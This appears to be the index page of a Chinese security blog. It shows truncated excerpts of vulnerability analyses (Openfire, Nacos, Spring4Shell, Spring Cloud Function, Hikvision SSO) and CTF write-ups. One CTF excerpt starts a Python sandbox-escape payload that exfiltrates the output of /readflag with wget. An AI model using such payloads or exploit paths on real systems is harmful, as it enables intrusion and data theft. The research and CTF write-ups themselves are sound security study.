Bmth's blog

前些日子这个洞刚出的时候几乎通杀，有幸拿到了源码，就来分析一下 代码审计权限绕过首先是一个权限绕过问题，看到配置文件 cas-client.properties 发现cas.ignore.pattern，很明显存放的就是绕过权限的路径，全局查找一下看到bic-sso-client-1.6.9.4.RELEASE.jar!/com/hikvision/sso/client/config/util/CasClientConfig.class 全局查找调用CasClientConfig.getCasClientConfig方法的类，看到bic-sso-client-1.6.9.4.RELEASE.jar!/org/jasig/cas/client/util/AbstractConfigurationFilter.class的 getPropertyFromInitParams 方法 那么就找下什么时候 propertyName 的值为 ignorePattern在bic-sso-client-1.6.9.4.RELEASE.jar!/org/jasig/cas/client/authent ...

终于忙完项目了，没啥事，继续拿以前没做出来的题审计，还是tcl，得加强代码审计能力 环境搭建先下载个源码，直接选择最新版本：git clone https://github.com/PGYER/codefever.git参考官方文档，就直接用 docker 搭建，一行命令搞定 123456789docker container run \ -d --privileged=true --name codefever \ -p 8081:80 -p 22:22 \ -v ~/config/db:/var/lib/mysql \ -v ~/config/env:/data/www/codefever-community/env \ -v ~/config/logs:/data/www/codefever-community/application/logs \ -v ~/config/git-storage:/data/www/codefever-community/git-storage \ -v ~/config/file-storage:/data/www/codefe ...

闲着无聊，发现phpstorm中还留有一个代码审计的题，当时比赛的时候没做出来，那么就复现一下 环境搭建直接在官网中下载源码：https://down.q-cms.cn/QCMS_V6.0.1_220515.zip 用phpstudy搭建，web目录如下 然后创建一个数据库，导入sql文件，设置手机号以及密码就安装成功了 但是我不是在本机搭建的，就需要添加远程调试，phpstudy扩展开启xdebug，然后修改php.ini为： 12345678910111213[Xdebug]zend_extension=C:/phpstudy_pro/Extensions/php/php7.3.4nts/ext/php_xdebug.dllxdebug.collect_params=1xdebug.collect_return=1xdebug.auto_trace=Onxdebug.trace_output_dir=C:/phpstudy_pro/Extensions/php_log/php7.3.4nts.xdebug.tracexdebug.profiler_enable=Onxdebug. ...

Openfire是免费的、开源的、基于可拓展通讯和表示协议(XMPP)、采用Java编程语言开发的实时协作服务器 Openfire的管理控制台是一个基于 Web 的应用程序，被发现可以使用路径遍历的方式绕过权限校验。成功利用后，未经身份验证的用户可以访问 Openfire 管理控制台中的后台页面。同时由于Openfire管理控制台的后台提供了安装插件的功能，所以攻击者可以通过安装恶意插件达成远程代码执行的效果 官方通告：https://github.com/igniterealtime/Openfire/security/advisories/GHSA-gw42-f939-fhvm 影响版本： 3.10.0 <= Openfire < 4.6.8 4.7.0 <= Openfire < 4.7.5 环境搭建直接下载 openfire 4.7.4：https://github.com/igniterealtime/Openfire/releases/download/v4.7.4/openfire_4_7_4.tar.gz 然后解压，通过 ...

在Nacos 2.2.3版本中，修复了一个hessian反序列化漏洞 该漏洞主要是针对部分Jraft请求处理时，使用hessian进行反序列化未限制而造成的RCE漏洞 影响版本： 1.4.0 <= Nacos < 1.4.6 使用cluster集群模式运行 2.0.0 <= Nacos < 2.2.3 任意模式启动均受到影响 漏洞分析看到漏洞修复：https://github.com/alibaba/nacos/pull/10542/filescom.alibaba.nacos.consistency.serialize.HessianSerializer 使用 NacosHessianSerializerFactory 代替了默认的 SerializerFactory，而这是一个白名单类，相当于从根源上解决了反序列化问题 继续看到其他改动可以发现 主要就是在onApply、onRequest方法会触发serializer.deserialize反序列化，对如下几个类做了修改： 12345com.alibaba.nacos.nami ...

在2023的ciscn初赛中有一道Nacos配合Spring Cloud Gateway RCE的题，其实非常简单就是：Nacos结合Spring Cloud Gateway RCE利用 ，然后配合CVE-2021-29441即可 其实近期还出现了一个认证漏洞，修复版本：https://github.com/alibaba/nacos/releases/tag/2.2.0.1 在该版本中移除了默认鉴权插件中依赖的nacos.core.auth.plugin.nacos.token.secret.key默认值，来简单看一下 环境搭建下载存在漏洞的版本：https://github.com/alibaba/nacos/releases/tag/2.2.0解压后执行 12345cd nacos/bin#启动服务器bash startup.sh -m standalone#关闭服务器bash shutdown.sh 随后访问ip:8848/nacos即可访问到web服务 默认账号密码是nacos、nacos 修改startup.sh添加JVM远程调试 即可远程调试代码 漏洞分析官方鉴权方面的 ...

抽空参加了一下东北电力大学的公开赛，题出的挺好的，遂专门写一篇文章，主要是学习一下java题 Cute Cirno访问/r3aDF1le?filename=可以任意文件读取，发现filename传空时会报错 给出了源码路径，其实也可以读取/proc/self/cmdline获取路径 CuteCirno.py： 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657from flask import Flask, request, session, render_template, render_template_stringimport os, base64from NeepuFile import neepu_filesCuteCirno = Flask(__name__, static_url_path='/static', static_ ...

继续看看最近的Spring框架漏洞，非常有名的Spring4Shell 官方通告：https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement 环境搭建使用github上的docker项目：https://github.com/reznok/Spring4Shell-POC 修改Dockerfile进行换源，debian各个版本的阿里镜像：https://developer.aliyun.com/mirror/debian 添加我们的远程调试： 1ENV JAVA_TOOL_OPTIONS -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:10087 最后开启docker，docker build . -t spring4shell && docker run -p 8080:8080 -p 10087:10087 spring4shell 漏洞分析这个漏洞基于CVE-2010-1622，是该漏洞的补丁绕 ...

记录一下2023 AntCTF x D3CTF的做题思路，并复现一下没做出来的题 Escape Plan题目描述： The success for a break out depends on three things. layout: black_char routine: Python tricks help: Run /readflag to get flag, dns tunneling may help you 题目给出了源码 可以看到就是一个黑名单的绕过技巧，这里找到文章：Python 沙箱逃逸的通解探索之路题目环境是python3.8，支持了 Unicode 变量名，那么就可以利用特殊字符来绕过关键字 1eval == ᵉval 并且数字也是可以使用 Unicode 绕的，文章中使用的是：https://www.fileformat.info/info/unicode/category/Nd/list.htm 无回显，使用dnslog外带数据 1__import__('os').popen('wget `/readflag ...

Spring Cloud Function 是基于 Spring Boot 的函数计算框架。该项目致力于促进函数为主的开发单元，它抽象出所有传输细节和基础架构，并提供一个通用的模型，用于在各种平台上部署基于函数的软件 由于Spring Cloud Function中RoutingFunction类的apply方法将请求头中的spring.cloud.function.routing-expression参数作为Spel表达式进行处理，造成了Spel表达式注入漏洞，攻击者可利用该漏洞远程执行任意代码 官方通告：https://spring.io/security/cve-2022-22963 影响版本： 3.0.0.RELEASE <= Spring Cloud Function <= 3.1.6 Spring Cloud Function <= 3.2.2 不受影响版本： Spring Cloud Function 3.1.7 Spring Cloud Function 3.2.3 环境搭建可以借助Spring Initiali ...